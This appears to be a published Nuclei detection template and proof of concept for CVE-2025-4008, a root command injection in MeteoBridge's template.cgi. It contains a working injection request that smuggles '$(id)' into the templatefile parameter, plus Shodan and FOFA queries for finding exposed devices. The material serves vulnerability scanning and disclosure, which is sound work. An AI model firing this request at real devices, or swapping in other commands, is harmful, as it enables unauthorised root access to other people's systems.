The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
PoC代码[已公开]
id: CVE-2025-4008
info:
name: MeteoBridge <= 6.1 - Remote Code Execution
author: iamnoooob,pdresearch
severity: high
description: |
The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
reference:
- https://forum.meteohub.de/viewtopic.php?t=18687
- https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
- https://nvd.nist.gov/vuln/detail/CVE-2025-4008
classification:
cve-id: CVE-2025-4008
cvss-score: 7.5
cwe-id: CWE-77
epss-score: 0.03526
epss-percentile: 0.872
metadata:
verified: true
shodan-query: "meteobridge"
fofa-query: "Meteobridge"
tags: cve,cve2025,meteobridge,rce
http:
- raw:
- |
GET /public/template.cgi?templatefile=$(id) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error: template file'
- 'uid='
- 'gid='
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f61962192fccdd2a0d160ff2fdab689d325995aa17ae82c0710ea5e9f8e52dbd022100e07dc2ca8101bec72bf11032b669dfa3766e962a83413df1b9738dccdf27f3a4:922c64590222798bb761d5b6d8e72950